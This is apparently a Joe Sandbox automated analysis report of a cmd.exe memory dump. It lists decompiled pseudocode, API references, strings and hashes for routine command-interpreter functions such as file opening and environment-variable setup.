											_t84 =  *0xdad0d0; // 0xffffffff
											__eflags = _t84 - 0xffffffff;
											if(_t84 != 0xffffffff) {
												L68:
												__eflags = _t84;
												if(_t84 != 0) {
													_t149 = GetProcAddress(_t84, "SetThreadUILanguage");
													 *0xdad5f8 = _t149;
												}
												L70:
												__eflags = _t149;
												if(_t149 != 0) {
													goto L27;
												}
												SetThreadLocale(0x409);
												L28:
												_t147 = _v568;
												goto L29;
											}
											_t84 = GetModuleHandleW(L"KERNEL32.DLL");
											_t149 =  *0xdad5f8; // 0x0
											 *0xdad0d0 = _t84;
											__eflags = _t84 - 0xffffffff;
											if(_t84 == 0xffffffff) {
												goto L70;
											}
											goto L68;
										}
										L27:
										 *0xdc94b4(0);
										_t149->i();
										goto L28;
									} else {
										_t91 = E00D8D7D4( *(_t147 + 0x38), 0x2a);
										__eflags = _t91;
										if(_t91 != 0) {
											goto L26;
										}
										_t44 = _t91 + 0x3f; // 0x3f
										_t92 = E00D8D7D4( *(_t147 + 0x38), _t44);
										__eflags = _t92;
										if(_t92 != 0) {
											goto L26;
										}
										_t141 = _v28;
										__eflags = _v28;
										if(__eflags == 0) {
											_t141 = _t152 + 0x20;
										}
										_t93 = E00D910B0(_t147, _t141, __eflags,  *((intOrPtr*)(_t152 + 0x230)));
										__eflags = _t93 - 2;
										if(_t93 != 2) {
											goto L26;
										} else {
											__eflags =  *(_t147 + 0x34);
											if( *(_t147 + 0x34) == 0) {
												L62:
												_t94 = _v28;
												__eflags = _t94;
												if(__eflags == 0) {
													_t94 = _t152 + 0x20;
												}
												_t136 =  *_t111;
												_push(_t94);
												_push(_t111[1]);
												_t95 = E00D91F52(_t111, _t147,  *_t111, _t143, _t147, __eflags);
												__eflags = _t95;
												if(_t95 != 0) {
													goto L72;
												} else {
													_t147 = 0;
													_v568 = 1;
													_v572 = 0;
													goto L29;
												}
											} else {
												_t136 = _t147;
												_t96 = E00DA76C0(_v556, _t147);
												__eflags = _t96;
												if(_t96 != 0) {
													L72:
													__imp__??_V@YAXPAX@Z(_v36);
													_t152 = _t152 + 4;
													_t63 = 1;
													goto L33;
												}
												goto L62;
											}
										}
									}
								}
							} else {
								L42:
								_t147 = _v564;
								L30:
								if( *0xdc3cc4 != _t111) {
									goto L79;
								}
								_t143 = _v560;
								_t136 = _v556;
								continue;
							}
						}
					}
				}
			}

0x00d8e560
0x00d8e568
0x00d8e56e
0x00d8e575
0x00d8e57f
0x00d8e581
0x00d8e585
0x00d8e589
0x00d8e58e
0x00d8e592
0x00d8e596
0x00d8e5a0
0x00d9c011
0x00d9c011
0x00000000
0x00d8e5a6
0x00000000
0x00d8e5b0
0x00d8e5b7
0x00d9be97
0x00d9be9c
0x00d9be9c
0x00d8e5c4
0x00d8e5cb
0x00d8e5d5
0x00d8e5dc
0x00d8e5e1
0x00000000
0x00000000
0x00d8e5f1
0x00d8e5f7
0x00d8e5f9
0x00d8e5ff
0x00d8e602
0x00d8e605
0x00d8e608
0x00d8e60a
0x00d8e60f
0x00d8e62b
0x00d8e62c
0x00d8e632
0x00d8e637
0x00000000
0x00000000
0x00d8e640
0x00d9bfcf
0x00d9bfd4
0x00d9bfdb
0x00d9bfdd
0x00d9bfe4
0x00d9bfe6
0x00d9bff7
0x00d9bffc
0x00d9bffc
0x00d9bfe4
0x00d9bfff
0x00d9c00b
0x00000000
0x00d8e656
0x00d8e659
0x00d8e794
0x00000000
0x00d8e65f
0x00d8e65f
0x00d8e663
0x00000000
0x00d8e663
0x00d8e659
0x00d8e640
0x00d8e614
0x00d9bea5
0x00d9beab
0x00d9beab
0x00d9beac
0x00d9beae
0x00d9beae
0x00d9beb1
0x00d9beb1
0x00d9beb1
0x00d9beb6
0x00d8e621
0x00000000
0x00d8e7ad
0x00d8e7b0
0x00d8e7b4
0x00000000
0x00000000
0x00d8e7c4
0x00d8e7c6
0x00d8e7c8
0x00d9bfc5
0x00d9bfc5
0x00d8e798
0x00d8e79f
0x00d8e7a0
0x00d8e7a1
0x00d8e7a2
0x00d8e7ac
0x00d8e7ac
0x00d8e7d3
0x00d8e7d9
0x00d8e7de
0x00d8e7e1
0x00d8e7e3
0x00000000
0x00000000
0x00d8e7f0
0x00d8e7f5
0x00d8e7f8
0x00d8e7fa
0x00000000
0x00000000
0x00d8e805
0x00d8e80a
0x00d8e80d
0x00d8e814
0x00d8e667
0x00d8e669
0x00d8e81d
0x00d8e81f
0x00d8e827
0x00d8e827
0x00d8e81f
0x00d8e66f
0x00d8e673
0x00d8e684
0x00d8e832
0x00d8e836
0x00d8e68a
0x00d8e691
0x00d8e693
0x00d8e89d
0x00d8e89f
0x00d8e8a2
0x00d9bebb
0x00d9bec2
0x00d9bec4
0x00d9beca
0x00d9becf
0x00d9bed3
0x00d9bedd
0x00d9bee2
0x00d9bee4
0x00d9bee4
0x00d9bec4
0x00d8e8a2
0x00d8e693
0x00d8e69c
0x00d8e846
0x00d8e846
0x00d8e6ab
0x00d8e6b9
0x00d8e6c1
0x00d8e6cc
0x00d8e6d1
0x00d8e6dc
0x00d9beec
0x00d8e6e2
0x00d8e6e2
0x00d8e6e2
0x00d8e6f3
0x00d9bfc0
0x00000000
0x00d8e6f9
0x00d8e6fb
0x00d9bef6
0x00d9bef8
0x00d8e76b
0x00d8e772
0x00d8e778
0x00000000
0x00d8e778
0x00d8e704
0x00d8e721
0x00d8e721
0x00d8e72d
0x00d8e731
0x00d8e736
0x00d8e742
0x00d8e747
0x00d8e74d
0x00d8e755
0x00d9bf4d
0x00d9bf52
0x00d9bf55
0x00d9bf72
0x00d9bf72
0x00d9bf74
0x00d9bf82
0x00d9bf84
0x00d9bf84
0x00d9bf8a
0x00d9bf8a
0x00d9bf8c
0x00000000
0x00000000
0x00d9bf97
0x00d8e767
0x00d8e767
0x00000000
0x00d8e767
0x00d9bf5c
0x00d9bf62
0x00d9bf68
0x00d9bf6d
0x00d9bf70
0x00000000
0x00000000
0x00000000
0x00d9bf70
0x00d8e75b
0x00d8e75f
0x00d8e765
0x00000000
0x00d8e84e
0x00d8e856
0x00d8e85b
0x00d8e85d
0x00000000
0x00000000
0x00d8e866
0x00d8e869
0x00d8e86e
0x00d8e870
0x00000000
0x00000000
0x00d8e876
0x00d8e87d
0x00d8e87f
0x00d8e8ad
0x00d8e8ad
0x00d8e88a
0x00d8e88f
0x00d8e892
0x00000000
0x00d8e898
0x00d9bf01
0x00d9bf05
0x00d9bf1a
0x00d9bf1a
0x00d9bf21
0x00d9bf23
0x00d9bf25
0x00d9bf25
0x00d9bf29
0x00d9bf2d
0x00d9bf2e
0x00d9bf31
0x00d9bf36
0x00d9bf38
0x00000000
0x00d9bf3a
0x00d9bf3a
0x00d9bf3c
0x00d9bf44
0x00000000
0x00d9bf44
0x00d9bf07
0x00d9bf0b
0x00d9bf0d
0x00d9bf12
0x00d9bf14
0x00d9bfa2
0x00d9bfa9
0x00d9bfaf
0x00d9bfb2
0x00000000
0x00d9bfb2
0x00000000
0x00d9bf14
0x00d9bf05
0x00d8e892
0x00d8e704
0x00d8e83d
0x00d8e83d
0x00d8e83d
0x00d8e77b
0x00d8e781
0x00000000
0x00000000
0x00d8e787
0x00d8e78b
0x00000000
0x00d8e78b
0x00d8e673
0x00d8e5cb
0x00d8e5b0

APIs

_tell.MSVCRT ref: 00D8E5F9
_close.MSVCRT ref: 00D8E62C
memset.MSVCRT ref: 00D8E6CC
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00D8E736
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00DB3840), ref: 00D8E747
??_V@YAXPAX@Z.MSVCRT ref: 00D8E772

Strings

KERNEL32.DLL, xrefs: 00D9BF57
SetThreadUILanguage, xrefs: 00D9BF76
GOTO, xrefs: 00D8E7CE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ConsoleInfoOutput_close_tellmemset
String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
API String ID: 1380661413-3584302480
Opcode ID: f8a37551292110d9699a852a6cbf6819b64020c59bbf39eb2fdbec5411acb4f7
Instruction ID: 21801cac3771e52c66e002e1ba53a863cb7b2f5b1f8e6348f31f763fa5343350
Opcode Fuzzy Hash: f8a37551292110d9699a852a6cbf6819b64020c59bbf39eb2fdbec5411acb4f7
Instruction Fuzzy Hash: C1B1A070604302CBDB24AF24E945B2AB7E5EF85714F190929E886D73A1EB71DC45CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D120, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177
fileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00D8D120(long __ecx, signed int __edx) {
				void _v8;
				long _v12;
				long _v16;
				long _v20;
				signed int _v24;
				long _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				signed int _t34;
				long _t37;
				void* _t41;
				signed int _t44;
				signed int _t49;
				int _t54;
				signed char _t64;
				void* _t67;
				signed int _t71;
				long _t75;
				void* _t76;
				signed int _t78;
				signed int _t79;
				void* _t81;

				_t65 = __ecx;
				_t75 = 3;
				_v20 = __ecx;
				_t64 = __edx;
				_v16 = 3;
				_t71 = __edx & 0x00000003;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor = 0;
				_v40.nLength = 0xc;
				if(_t71 > 2) {
					L2:
					return _t34 | 0xffffffff;
				}
				_t34 = __edx & 0x00000009;
				if(_t34 != 9) {
					if(_t71 != 0) {
						_t78 = 0x40000000;
						__imp___wcsicmp(__ecx, L"con");
						_t81 = _t81 + 8;
						if(_t34 != 0) {
							_t75 = 1;
							_v16 = 1;
						}
						_t65 = _v20;
						_t37 = 2;
					} else {
						_t78 = 0x80000000;
						_t37 = 3;
					}
					_push(0);
					_push(0x80);
					if(_t64 == 0x10a) {
						_t41 = CreateFileW(_t65, _t78 | 0x80000000, _t75,  &_v40, 3, ??, ??);
						_t76 = _t41;
						if(_t76 != 0xffffffff) {
							goto L9;
						}
						_push(0);
						_push(0x80);
						_push(4);
						_push( &_v40);
						_push(_v16);
						_push(_t78);
						_push(_v20);
						goto L8;
					} else {
						_push(_t37);
						_push( &_v40);
						_push(_t75);
						_push(_t78);
						_push(_t65);
						L8:
						_t41 = CreateFileW();
						_t76 = _t41;
						if(_t76 == 0xffffffff) {
							_t54 = GetLastError();
							 *0xdc3cf0 = _t54;
							if(_t54 == 0x6e) {
								 *0xdc3cf0 = 2;
							}
							L28:
							_t44 = _t54 | 0xffffffff;
							L14:
							return _t44;
						}
						L9:
						__imp___open_osfhandle(_t76, 8);
						_t79 = _t41;
						if((_t64 & 0x00000008) != 0) {
							if(E00D90178(_t41) != 0) {
								goto L10;
							}
							_t49 = GetFileSize(_t76,  &_v20);
							_v24 = _t49;
							if((_t49 | _v20) == 0) {
								goto L10;
							}
							_v12 = 0xffffffff;
							_v8 = 0;
							if(SetFilePointer(_t76, 0xffffffff,  &_v12, 2) == 0xffffffff) {
								_t54 = GetLastError();
								 *0xdc3cf0 = _t54;
								if(_t54 == 0) {
									goto L23;
								}
								if(_t79 == 0xffffffff) {
									_t54 = CloseHandle(_t76);
								} else {
									__imp___close(_t79);
								}
								goto L28;
							}
							L23:
							if(ReadFile(_t76,  &_v8, 1,  &_v28, 0) == 0) {
								_v12 = 0;
								SetFilePointer(_t76, 0,  &_v12, 2);
							}
							if(_v8 == 0x1a) {
								_v12 = 0xffffffff;
								SetFilePointer(_t76, 0xffffffff,  &_v12, 2);
							}
						}
						L10:
						_t9 = _t79 - 3; // -3
						_t67 = 0;
						if(_t9 <= 0x5b) {
							if(_t79 > 0x1f) {
								_t33 = _t79 - 0x20; // -32
								_t67 = (_t33 >> 5) + 1;
							}
							asm("bts eax, edx");
						}
						_t44 = _t79;
						goto L14;
					}
				}
				goto L2;
			}

0x00d8d120
0x00d8d12a
0x00d8d12f
0x00d8d132
0x00d8d134
0x00d8d137
0x00d8d139
0x00d8d140
0x00d8d147
0x00d8d151
0x00d8d15c
0x00000000
0x00d8d15c
0x00d8d155
0x00d8d15a
0x00d8d16a
0x00d8d1ea
0x00d8d1ef
0x00d8d1f5
0x00d8d1fa
0x00d8d1fc
0x00d8d201
0x00d8d201
0x00d8d204
0x00d8d207
0x00d8d16c
0x00d8d16c
0x00d8d171
0x00d8d171
0x00d8d173
0x00d8d175
0x00d8d180
0x00d8d221
0x00d8d227
0x00d8d22c
0x00000000
0x00000000
0x00d8d232
0x00d8d234
0x00d8d239
0x00d8d23e
0x00d8d23f
0x00d8d242
0x00d8d243
0x00000000
0x00d8d186
0x00d8d186
0x00d8d18a
0x00d8d18b
0x00d8d18c
0x00d8d18d
0x00d8d18e
0x00d8d18e
0x00d8d194
0x00d8d199
0x00d9b555
0x00d9b55b
0x00d9b563
0x00d9b565
0x00d9b565
0x00d9b56f
0x00d9b56f
0x00d8d1de
0x00000000
0x00d8d1de
0x00d8d19f
0x00d8d1a2
0x00d8d1ab
0x00d8d1b0
0x00d8d254
0x00000000
0x00000000
0x00d8d25f
0x00d8d265
0x00d8d26b
0x00000000
0x00000000
0x00d8d273
0x00d8d27c
0x00d8d290
0x00d9b577
0x00d9b57d
0x00d9b584
0x00000000
0x00000000
0x00d9b58d
0x00d9b59c
0x00d9b58f
0x00d9b590
0x00d9b596
0x00000000
0x00d9b58d
0x00d8d296
0x00d8d2ab
0x00d9b5a9
0x00d9b5b4
0x00d9b5b4
0x00d8d2b6
0x00d9b5c4
0x00d9b5cf
0x00d9b5cf
0x00d8d2b6
0x00d8d1b6
0x00d8d1b6
0x00d8d1b9
0x00d8d1c0
0x00d8d1c5
0x00d9b5da
0x00d9b5e2
0x00d9b5e8
0x00d8d1d2
0x00d8d1d5
0x00d8d1dc
0x00000000
0x00d8d1dc
0x00d8d180
0x00000000

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 00D8D18E
_open_osfhandle.MSVCRT ref: 00D8D1A2
_wcsicmp.MSVCRT ref: 00D8D1EF
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,00DAF830,00002000), ref: 00D8D221
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00D8D25F
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00D8D287
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00D8D2A3
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 00D9B5B4
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00D9B5CF

Strings

con, xrefs: 00D8D1E4

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
String ID: con
API String ID: 686027947-4257191772
Opcode ID: 44ff4c53c32e6bb1b6d826abaeb6a2792db751c0973ba176898722159edfcf8b
Instruction ID: a2c81523f5e526324d4becf12302069f325783ddf217323e21ce1cbe79c41b81
Opcode Fuzzy Hash: 44ff4c53c32e6bb1b6d826abaeb6a2792db751c0973ba176898722159edfcf8b
Instruction Fuzzy Hash: F351D371A00306ABDB10EBA49D4DFAEB7BAEF45720F254215F965E22D0DB7089019771

Uniqueness

Uniqueness Score: -1.00%

Function 00D8CEA9, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00D8CEA9() {
				signed int _v8;
				long _v12;
				char _v16;
				int _v20;
				void _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				WCHAR* _t41;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				void* _t53;
				int _t55;
				void* _t56;
				struct HINSTANCE__* _t78;
				signed int _t79;
				struct HINSTANCE__* _t81;
				void* _t85;
				int* _t88;
				void* _t89;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t96;
				signed int _t98;

				_t30 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t30 ^ _t98;
				_t91 = 0;
				_v12 = 0x104;
				_v20 = 0;
				_v16 = 1;
				memset( &_v540, 0, 0x104);
				if(E00D90C70( &_v540, ((0 | _v16 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					do {
						__eflags = E00D94B60(__eflags, 0);
					} while (__eflags == 0);
					exit(1);
					L13:
					_t41 =  &_v540;
					L2:
					GetModuleFileNameW(_t91, _t41, _v12);
					if(E00D8CFBC(L"PATH") == 0) {
						E00D93A50(L"PATH", 0xd824ac);
					}
					if(E00D8CFBC(L"PATHEXT") == 0) {
						E00D93A50(L"PATHEXT", L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t95 = L"PROMPT";
					if(E00D8CFBC(L"PROMPT") == 0) {
						E00D93A50(L"PROMPT", L"$P$G");
					}
					if(E00D8CFBC(L"COMSPEC") == 0) {
						_t68 = _v20;
						__eflags = _v20;
						if(_v20 == 0) {
							_t68 =  &_v540;
						}
						_t85 = 0x2e;
						_t50 = E00D8D7D4(_t68, _t85);
						__eflags = _t50;
						if(_t50 != 0) {
							L33:
							_t86 = _v20;
							__eflags = _v20;
							if(_v20 == 0) {
								_t86 =  &_v540;
							}
							E00D93A50(L"COMSPEC", _t86);
							goto L6;
						} else {
							__imp___wcsupr(L"CMD.EXE");
							_t78 = _v20;
							_t96 = _t78;
							__eflags = _t78;
							if(_t78 == 0) {
								_t96 =  &_v540;
							}
							_t88 =  &(_t96->i);
							do {
								_t55 = _t96->i;
								_t96 =  &(_t96->i);
								__eflags = _t55 - _t91;
							} while (_t55 != _t91);
							_t91 = _t78;
							_t95 = _t96 - _t88 >> 1;
							__eflags = _t78;
							if(_t78 == 0) {
								_t91 =  &_v540;
								_t78 = _t91;
							}
							_t89 = 0x5c;
							_t56 = E00D92349(_t78, _t89);
							_t79 = _t95 - 1;
							__eflags = _t91 + _t79 * 2 - _t56;
							_t81 = _v20;
							if(_t91 + _t79 * 2 == _t56) {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"CMD.EXE");
							} else {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"\\CMD.EXE");
							}
							E00D918C0(_t81, _v12);
							goto L33;
						}
					} else {
						L6:
						_t52 = E00D8CFBC(L"KEYS");
						if(_t52 != 0) {
							__imp___wcsicmp(_t52, L"ON");
							__eflags = _t52;
							if(__eflags == 0) {
								 *0xdc852c = 1;
							}
						}
						_t73 =  *0xdc3cb8;
						_t109 =  *0xdc3cb8;
						if( *0xdc3cb8 == 0) {
							_t73 = 0xdc3ab0;
						}
						_t53 = E00D933FC(1, _t73, 1, _t91, _t95, _t109);
						__imp__??_V@YAXPAX@Z();
						return E00D96FD0(_t53, 1, _v8 ^ _t98, 1, _t91, _t95, _v20);
					}
				}
				_t41 = _v20;
				if(_t41 == 0) {
					goto L13;
				}
				goto L2;
			}

0x00d8ceb4
0x00d8cebb
0x00d8cecc
0x00d8cece
0x00d8ced4
0x00d8ceda
0x00d8cedd
0x00d8cf03
0x00d9b419
0x00d9b41f
0x00d9b41f
0x00d9b424
0x00d9b42a
0x00d9b42a
0x00d8cf14
0x00d8cf19
0x00d8cf2d
0x00d9b43c
0x00d9b43c
0x00d8cf41
0x00d9b44d
0x00d9b44d
0x00d8cf47
0x00d8cf55
0x00d8cfae
0x00d8cfae
0x00d8cf63
0x00d9b457
0x00d9b45a
0x00d9b45c
0x00d9b45e
0x00d9b45e
0x00d9b466
0x00d9b467
0x00d9b46c
0x00d9b46e
0x00d9b4e8
0x00d9b4e8
0x00d9b4eb
0x00d9b4ed
0x00d9b4ef
0x00d9b4ef
0x00d9b4fa
0x00000000
0x00d9b470
0x00d9b475
0x00d9b47c
0x00d9b47f
0x00d9b481
0x00d9b483
0x00d9b485
0x00d9b485
0x00d9b48b
0x00d9b48e
0x00d9b48e
0x00d9b491
0x00d9b494
0x00d9b494
0x00d9b49b
0x00d9b49d
0x00d9b49f
0x00d9b4a1
0x00d9b4a3
0x00d9b4a9
0x00d9b4a9
0x00d9b4ad
0x00d9b4ae
0x00d9b4b3
0x00d9b4b9
0x00d9b4bb
0x00d9b4be
0x00d9b4d1
0x00d9b4d3
0x00d9b4d5
0x00d9b4d5
0x00d9b4db
0x00d9b4c0
0x00d9b4c0
0x00d9b4c2
0x00d9b4c4
0x00d9b4c4
0x00d9b4ca
0x00d9b4ca
0x00d9b4e3
0x00000000
0x00d9b4e3
0x00d8cf69
0x00d8cf69
0x00d8cf6e
0x00d8cf75
0x00d9b50a
0x00d9b512
0x00d9b514
0x00d9b51a
0x00d9b51a
0x00d9b514
0x00d8cf7b
0x00d8cf81
0x00d8cf83
0x00d8cfb5
0x00d8cfb5
0x00d8cf87
0x00d8cf8f
0x00d8cfa6
0x00d8cfa6
0x00d8cf63
0x00d8cf09
0x00d8cf0e
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00D8CEDD

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 00D8CF19

Part of subcall function 00D8CFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DAF830,00002000,?,?,?,?,?,00D9373A,00D8590A,00000000), ref: 00D8CFDF

Part of subcall function 00D8CFBC: _wcsicmp.MSVCRT ref: 00D8D005
Part of subcall function 00D8CFBC: _wcsicmp.MSVCRT ref: 00D8D01B
Part of subcall function 00D8CFBC: _wcsicmp.MSVCRT ref: 00D8D031
Part of subcall function 00D8CFBC: _wcsicmp.MSVCRT ref: 00D8D047
Part of subcall function 00D8CFBC: _wcsicmp.MSVCRT ref: 00D8D05D
Part of subcall function 00D8CFBC: _wcsicmp.MSVCRT ref: 00D8D073
Part of subcall function 00D8CFBC: _wcsicmp.MSVCRT ref: 00D8D085
Part of subcall function 00D8CFBC: _wcsicmp.MSVCRT ref: 00D8D09B

??_V@YAXPAX@Z.MSVCRT ref: 00D8CF8F
exit.MSVCRT ref: 00D9B424
_wcsupr.MSVCRT ref: 00D9B475

Strings

\CMD.EXE, xrefs: 00D9B4CA
PATH, xrefs: 00D8CF1F
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00D9B446
COMSPEC, xrefs: 00D8CF57, 00D9B4F5
KEYS, xrefs: 00D8CF69
PROMPT, xrefs: 00D8CF47
PATHEXT, xrefs: 00D8CF33
$P$G, xrefs: 00D8CFA7

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
API String ID: 2336066422-4197029667
Opcode ID: 9f9b532022a4f2acd8e0553e06e51ce5dd004a3ab2f87265e8db8ec96cfbf247
Instruction ID: 0d8d8aade403abf340277fc5b4fdd329e8b5990248a62962d0b47f50bc0cad0c
Opcode Fuzzy Hash: 9f9b532022a4f2acd8e0553e06e51ce5dd004a3ab2f87265e8db8ec96cfbf247
Instruction Fuzzy Hash: 88510531B0021A9BDF14FB619955ABEB376EF90718B05446EE906D3282DF34DE06CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D933FC, Relevance: 24.3, APIs: 16, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00D933FC(short __ebx, WCHAR* __ecx, WCHAR* __edx, WCHAR* __edi, void* __esi, void* __eflags) {
				void* _t75;
				short _t86;
				WCHAR* _t87;
				WCHAR* _t88;
				signed short* _t90;
				short _t93;
				int _t94;
				WCHAR* _t96;
				WCHAR* _t105;
				short _t109;
				WCHAR* _t113;
				WCHAR* _t115;
				WCHAR* _t125;
				signed int _t126;
				void* _t131;
				WCHAR* _t142;
				WCHAR* _t145;
				WCHAR* _t153;
				short* _t164;
				WCHAR* _t166;
				signed int _t168;
				WCHAR* _t169;
				short* _t176;
				void* _t177;

				_t173 = __edi;
				_t135 = __ebx;
				_push(0x240);
				_push(0xdabdd8);
				E00D975CC(__ebx, __edi, __esi);
				 *(_t177 - 0x24c) = __edx;
				_t175 = __ecx;
				_t75 = 0x5c;
				if( *((intOrPtr*)(__ecx)) == _t75) {
					if( *((intOrPtr*)(__ecx + 2)) != _t75) {
						goto L1;
					} else {
					}
				} else {
					L1:
					E00D90D51(_t177 - 0x244);
					if(E00D90C70(_t177 - 0x244, ((0 |  *((intOrPtr*)(_t177 - 0x38)) == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						L52:
						E00D90DE8(_t82, _t177 - 0x244);
						goto L54;
					} else {
						_t173 = E00D8DF40(_t175);
						 *(_t177 - 0x250) = _t173;
						if(_t173 == 0) {
							goto L52;
						} else {
							 *((intOrPtr*)(_t177 - 4)) = 0;
							_t142 = _t173;
							_t9 =  &(_t142[1]); // 0x2
							_t164 = _t9;
							do {
								_t86 =  *_t142;
								_t142 =  &(_t142[1]);
							} while (_t86 != 0);
							_t87 =  &(_t173[_t142 - _t164 >> 1]);
							_t145 = _t87;
							while(1) {
								 *(_t177 - 0x248) = _t87;
								if(_t145 <= _t173) {
									break;
								}
								_t13 = _t87 - 2; // -4
								_t145 = _t13;
								if( *_t145 == 0x20) {
									_t87 = _t145;
									continue;
								}
								break;
							}
							 *_t87 = 0;
							_t88 =  *(_t177 - 0x3c);
							if(_t88 == 0) {
								_t88 = _t177 - 0x244;
							}
							GetCurrentDirectoryW( *(_t177 - 0x34), _t88);
							_t90 =  *(_t177 - 0x3c);
							if(_t90 == 0) {
								_t90 = _t177 - 0x244;
							}
							_t135 = towupper( *_t90 & 0x0000ffff);
							_t93 = 0x3d;
							 *((short*)(_t177 - 0x28)) = _t93;
							_t94 = iswalpha( *_t173 & 0x0000ffff);
							_t175 = 0x3a;
							if(_t94 == 0 || _t173[1] != _t175) {
								 *((short*)(_t177 - 0x26)) = _t135;
							} else {
								 *((short*)(_t177 - 0x26)) = towupper( *_t173 & 0x0000ffff);
							}
							 *(_t177 - 0x24) = _t175;
							 *((short*)(_t177 - 0x22)) = 0;
							_t96 =  *(_t177 - 0x3c);
							if(_t96 == 0) {
								_t96 = _t177 - 0x244;
							}
							_t97 = GetFullPathNameW(_t173,  *(_t177 - 0x34), _t96, _t177 - 0x248);
							if(_t97 == 0) {
								L62:
								_t175 = GetLastError();
								goto L64;
							} else {
								if(_t97 >  *(_t177 - 0x34)) {
									L65:
									E00D90DE8(_t97, _t177 - 0x244);
									_push(0xfffffffe);
									_push(_t177 - 0x10);
									_push(0xdad0b4);
									L00D982BB();
								} else {
									_t153 =  *(_t177 - 0x3c);
									_t105 = _t153;
									if(_t153 == 0) {
										_t105 = _t177 - 0x244;
									}
									if( *_t105 == 0) {
										L55:
										E00D90DE8(_t105, _t177 - 0x244);
										_push(0xfffffffe);
										_push(_t177 - 0x10);
										_push(0xdad0b4);
										L00D982BB();
										_push(3);
										goto L56;
									} else {
										if(_t153 == 0) {
											_t105 = _t177 - 0x244;
										}
										if(_t105[1] != _t175) {
											goto L55;
										} else {
											_t166 = _t153;
											if(_t153 == 0) {
												_t166 = _t177 - 0x244;
											}
											_t176 =  &(_t166[1]);
											do {
												_t109 =  *_t166;
												_t166 =  &(_t166[1]);
											} while (_t109 !=  *((intOrPtr*)(_t177 - 4)));
											_t168 = _t166 - _t176 >> 1;
											if(_t153 == 0) {
												_t153 = _t177 - 0x244;
											}
											_t169 =  &(_t153[_t168]);
											while(1) {
												_t175 = _t169;
												 *(_t177 - 0x248) = _t169;
												if(_t175 <= E00D96CF0(_t177 - 0x244) + 6) {
													break;
												}
												_t131 = 0x5c;
												if( *((intOrPtr*)(_t169 - 2)) == _t131) {
													_t169 = _t175 - 2;
													continue;
												}
												break;
											}
											 *_t169 = 0;
											_t113 =  *(_t177 - 0x3c);
											if(_t113 == 0) {
												_t113 = _t177 - 0x244;
											}
											if(GetFileAttributesW(_t113) == 0xffffffff) {
												_t175 = GetLastError();
												if(_t175 == 2 || _t175 == 3) {
													goto L29;
												} else {
													if(_t175 != 0x7b) {
														goto L64;
													} else {
														goto L29;
													}
												}
											} else {
												L29:
												if( *0xdc3cc9 == 0) {
													L32:
